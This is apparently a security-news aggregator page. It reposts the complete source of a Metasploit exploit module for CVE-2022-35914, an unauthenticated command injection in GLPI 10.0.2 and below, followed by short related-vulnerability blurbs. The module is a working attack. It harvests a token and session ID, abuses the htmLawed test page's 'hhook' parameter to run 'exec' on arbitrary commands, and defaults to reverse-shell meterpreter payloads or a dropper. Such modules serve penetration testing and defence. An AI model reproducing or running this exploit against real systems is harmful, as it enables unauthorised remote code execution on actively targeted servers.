Security
Headlines
HeadlinesLatestCVEs

Headline

GLPI 10.0.2 Command Injection

This Metasploit module exploits an unauthenticated PHP command injection vulnerability in GLPI versions 10.0.2 and below to execute a command.

Packet Storm
#vulnerability#linux#git#php#xpath#auth
### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  prepend Msf::Exploit::Remote::AutoCheck  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::CmdStager  def initialize(info = {})    super(      update_info(        info,        'Name' => 'GLPI htmLawed php command injection',        'Description' => %q{          This exploit takes advantage of a unauthenticated php command injection available          from GLPI versions 10.0.2 and below to execute a command.        },        'License' => MSF_LICENSE,        'Author' => [          'cosad3s', # PoC https://github.com/cosad3s/CVE-2022-35914-poc          'bwatters-r7' # module        ],        'References' => [          ['CVE', '2022-35914' ],          ['URL', 'https://github.com/cosad3s/CVE-2022-35914-poc']        ],        'Platform' => 'linux',        'Arch' => [ARCH_X64, ARCH_CMD],        'CmdStagerFlavor' => [ 'printf' ],        'Targets' => [          [            'Unix Command',            {              'Platform' => 'unix',              'Arch' => ARCH_CMD,              'Type' => :unix_cmd,              'DefaultOptions' => {                'PAYLOAD' => 'cmd/unix/python/meterpreter/reverse_tcp',                'RPORT' => 80,                'URIPATH' => '/glpi/'              }            }          ],          [            'Linux (Dropper)',            {              'Platform' => 'linux',              'Arch' => [ARCH_X64],              'DefaultOptions' => {                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp',                'RPORT' => 80,                'URIPATH' => '/glpi/'              },              'Type' => :linux_dropper            }          ],        ],        'DisclosureDate' => '2022-01-26',        'DefaultTarget' => 0,        'Notes' => {          'Stability' => [ CRASH_SAFE ],          'Reliability' => [ REPEATABLE_SESSION ],          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ]        }      )    )  end  def populate_values    uri = "#{datastore['URIPATH']}/vendor/htmlawed/htmlawed/htmLawedTest.php"    begin      res = send_request_cgi({        'method' => 'GET',        'uri' => normalize_uri(uri),        'connection' => 'keep-alive',        'accept' => '*/*'      })      @html = res.get_html_document      @token = @html.at_xpath('//input[@id="token"]')['value']      vprint_status("token = #{@token}")      # sometimes I got > 1 sid.  We must use the last one.      @sid = res.get_cookies.match(/.*=(.*?);.*/)[1]      vprint_status("sid = #{@sid}")    rescue NoMethodError => e      elog('Failed to retrieve token or sid', error: e)    end  end  def execute_command(cmd, _opts = {})    populate_values if @sid.nil? || @token.nil?    uri = datastore['URIPATH'] + '/vendor/htmlawed/htmlawed/htmLawedTest.php'    send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(uri),      'cookie' => 'sid=' + @sid,      'ctype' => 'application/x-www-form-urlencoded',      'encode_params' => true,      'vars_post' => {        'token' => @token,        'text' => cmd,        'hhook' => 'exec',        'sid' => @sid      }    })  end  def check    populate_values if @html_doc.nil?    if @token.nil? || @sid.nil? || @html.nil?      return Exploit::CheckCode::Safe('Failed to retrieve htmLawed page')    end    return Exploit::CheckCode::Appears if @html.to_s.include?('htmLawed')    return Exploit::CheckCode::Safe('Unable to determine htmLawed status')  end  def exploit    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")    case target['Type']    when :unix_cmd      execute_command(payload.encoded)    when :linux_dropper      execute_cmdstager    end  endend

Related news

htmlLawed 1.2.5 Remote Command Execution

htmlLawed versions 1.2.5 and below proof of concept remote command execution exploit.

CVE-2023-26469: GitHub - Orange-Cyberdefense/CVE-repository: Repository of CVE found by OCD people

In Jorani 1.0.0, an attacker could leverage path traversal to access files and execute code on the server.

CISA's KEV Catalog Updated with 3 New Flaws Threatening IT Management Systems

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added three security flaws to its Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation. The list of vulnerabilities is below - CVE-2022-35914 (CVSS score: 9.8) - Teclib GLPI Remote Code Execution Vulnerability CVE-2022-33891 (CVSS score: 8.8) - Apache Spark Command Injection Vulnerability

CVE-2022-35914: absent?: ././internal_utilities/htmLawed?cve=title/ | PHP Labware source code viewer

/vendor/htmlawed/htmlawed/htmLawedTest.php in the htmlawed module for GLPI through 10.0.2 allows PHP code injection.

Packet Storm: Latest News

Acronis Cyber Protect/Backup Remote Code Execution